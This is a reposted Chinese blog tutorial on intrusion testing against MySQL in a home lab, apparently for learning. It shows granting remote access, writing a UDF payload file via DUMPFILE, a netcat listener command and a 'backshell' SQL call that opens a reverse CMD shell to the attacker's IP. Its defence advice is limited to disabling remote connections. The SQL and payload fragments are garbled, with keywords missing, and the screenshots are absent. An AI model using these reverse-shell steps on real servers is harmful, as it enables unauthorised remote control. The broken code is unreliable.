程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> MYSQL數據庫 >> MySQL綜合教程 >> MySql的入侵測試以及防范

MySql的入侵測試以及防范

編輯:MySQL綜合教程

在做了之前的SQL SERVER之後,便很想嘗試一下MYSQL的入侵測試已經防范,與大家一起分享。

總的來說,我一直在用的是MYSQL,對MYSQL比較熟悉,相比較而言,感覺MYSQL更安全,這只是我自己胡亂猜想的,希望不要引起什麼爭論神馬的。。。一本饅頭引發的血案。。。

正題之一

給予mysql遠程權限:

     .  數據庫賬號 identified   
 flush ;

 

給物理機遠程權限:

物理機成功連接上:

執行侵入測試前(有圖有真相):

執行侵入測試後(有圖有真相):

重啟前(有圖有真相):

重啟後(有圖有真相):

正題之二:

遠程登錄之後寫入代碼,代碼在yyd.txt當中,然後在MySql中寫入文件:

Win7 打另外一個cmd,本地端口映射:nc -vv -l -p 端口號

虛擬機上:執行映射:select backshell("物理機IP",端口號);

這便執行了3306端口反彈CMD

(沒圖了。。。用到了一個nc軟件執行的映射)

 

yyd.txt大概內容:

et concat(   yyd ("");updateyyd  data   data  yyd  DUMPFILE   backshell  STRING SONAME ;

 

 

正題之三:

防范

 

感覺有點亂,主要是分享了兩種方法入侵,但是防范那部分應該是XP上的MySql服務關閉,但是早XP上做了好多測試,左後XP被我弄掛掉了。。。。好丟臉,只好把Win7上的MySql服務拿出來了。

覺得主要還是遠程連接的問題,“如果MySql不開啟遠程連接的話我們還是朋友”,開玩笑,如果MySql不開啟遠程連接的話入侵幾率會小的很多。

 

轉載請注明出處:http://www.cnblogs.com/yydcdut/p/3464215.html

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved